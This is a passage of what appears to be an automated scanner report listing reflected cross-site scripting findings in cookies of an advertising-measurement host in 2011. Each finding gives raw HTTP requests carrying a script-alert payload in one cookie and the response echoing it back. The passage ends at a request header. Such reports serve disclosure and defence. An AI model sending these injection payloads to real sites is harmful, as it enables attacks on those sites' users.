GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1 Host: ar.voicefive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403? Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&d1b6c<script>alert(1)</script>da4afe07d09; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:44:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=205&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:44:21 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:44:21 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 34267
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C ...[SNIP]... p=Sat Sep 17 14:04:38 2011&recExp=Sat Sep 17 14:04:38 2011&prad=65659550&arc=42804711&', "ar_p107223597": 'exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&d1b6c<script>alert(1)</script>da4afe07d09', "89dd482454781ab5297ad107": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133 ...[SNIP]...
|
5.76. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload 8f90f<script>alert(1)</script>d84fff57e96 was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=169413070&PG=DLSRD1&ASID=d97db84998f14df1adc268fef31dc64c&destination=;ord=169413070? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&8f90f<script>alert(1)</script>d84fff57e96; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:04:51 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 14:04:51 2011&8f90f<script>alert(1)</script>d84fff57e96=&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 14:04:51 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30531
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... 1&', "BMX_G"": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p108883753": 'exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&8f90f<script>alert(1)</script>d84fff57e96', "ar_p1088837538f683 b27e0f2581a": 'exp=1&initExp=Sat Sep 17 13:09:10 2011&recExp=Sat Sep 17 13:09:10 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=2&initExp=Sun Sep 4 12:13:34 2011&rec ...[SNIP]...
|
5.77. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload a14a6<script>alert(1)</script>65fcfcc7ab5 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&a14a6<script>alert(1)</script>65fcfcc7ab5; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:28 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=118&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:28 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:28 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29438
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... 41&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&a14a6<script>alert(1)</script>65fcfcc7ab5', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282]]> ...[SNIP]...
|
5.78. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload caf23<script>alert(1)</script>3b4408060ca was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&caf23<script>alert(1)</script>3b4408060ca; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:24 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=97&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:24 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:24 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29437
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... ep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&caf23<script>alert(1)</script>3b4408060ca', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', ...[SNIP]...
|
5.79. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload f5a43<script>alert(1)</script>513c514c979 was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f5a43<script>alert(1)</script>513c514c979; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=104&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:25 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:25 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29438
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... 3:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f5a43<script>alert(1)</script>513c514c979' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "www.Doralinks.com|www.PetNamesWorld.com|www.BigGreenHelp.com|www.HotelForDogsMovie.com|www.MundoNick.com|www.iCarly.com|www.MundoBob.com|www ...[SNIP]...
|
5.80. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 3caa2<script>alert(1)</script>08c614493d4 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&3caa2<script>alert(1)</script>08c614493d4; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:23 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=90&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:23 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:23 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29437
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... :09:06 2011&recExp=Sat Sep 17 13:09:06 2011&prad=65659550&arc=42804711&', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&3caa2<script>alert(1)</script>08c614493d4', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "www.Doralinks.com|w ...[SNIP]...
|
5.81. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload b4df0<script>alert(1)</script>c5e1b9b1385 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&b4df0<script>alert(1)</script>c5e1b9b1385; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:21 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=83&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:21 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:21 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29437
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... t Sep 17 13:09:10 2011&recExp=Sat Sep 17 13:09:10 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&b4df0<script>alert(1)</script>c5e1b9b1385', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C' ...[SNIP]...
|
5.82. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload a52da<script>alert(1)</script>0e18f0dae67 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
